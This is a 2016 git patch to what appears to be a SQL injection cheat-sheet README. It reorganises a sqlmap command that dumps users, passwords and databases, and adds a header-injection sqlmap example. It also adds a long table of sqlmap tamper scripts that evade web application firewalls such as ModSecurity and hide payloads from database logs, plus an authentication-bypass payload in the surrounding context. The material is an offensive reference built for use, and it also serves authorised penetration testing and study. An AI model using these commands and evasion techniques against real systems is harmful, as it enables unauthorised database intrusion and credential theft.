From d6eaa26820cf672527ba0fbf3966431f8ba13d00 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Sun, 4 Dec 2016 19:18:49 +0700 Subject: [PATCH] SQL injection - Tamper script --- SQL injection/README.md | 73 ++++++++++++++++++++++++++++++++++++++--- 1 file changed, 68 insertions(+), 5 deletions(-) diff --git a/SQL injection/README.md b/SQL injection/README.md index aa79a76..11bae55 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,10 +1,6 @@ # SQL injection A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application -## SQL injection using SQLmap -``` -sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -``` ## Entry point detection Detection of an SQL injection entry point @@ -26,6 +22,72 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` + + +## SQL injection using SQLmap +Basic arguments for SQLmap +``` +sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs +``` + +Custom injection in UserAgent/Header/Referer/Cookie +``` +python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*" +``` + +General tamper option and tamper's list +``` +tamper=name_of_the_tamper +``` + +| Tamper | Description | +| --- | --- | +|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | +|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| +|appendnullbyte.py | Appends encoded NULL byte character at the end of payload | +|base64encode.py | Base64 all characters in a given payload | +|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | +|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | +|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | +|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| +|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| +|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| +|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | +|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | +|equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | +|escapequotes.py | Slash escape quotes (' and ") | +|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | +|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | +|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| +|modsecurityversioned.py | Embraces complete query with versioned comment | +|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | +|multiplespaces.py | Adds multiple spaces around SQL keywords | +|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| +|percentage.py | Adds a percentage sign ('%') infront of each character | +|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | +|randomcase.py | Replaces each keyword character with random case value | +|randomcomments.py | Add random comments to SQL keywords| +|securesphere.py | Appends special crafted string| +|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | +|space2comment.py | Replaces space character (' ') with comments | +|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | +|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | +|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | +|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | +|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | +|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | +|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | +|space2plus.py | Replaces space character (' ') with plus ('+') | +|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | +|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | +|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | +|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | +|uppercase.py | Replaces each keyword character with upper case value 'INSERT'| +|varnish.py | Append a HTTP header 'X-originating-IP' | +|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | +|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | +|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| + ## Authentication bypass ``` '-' @@ -165,4 +227,5 @@ WHERE -> HAVING - [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) - [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) - [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet) - - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/) \ No newline at end of file + - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/) + - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html) \ No newline at end of file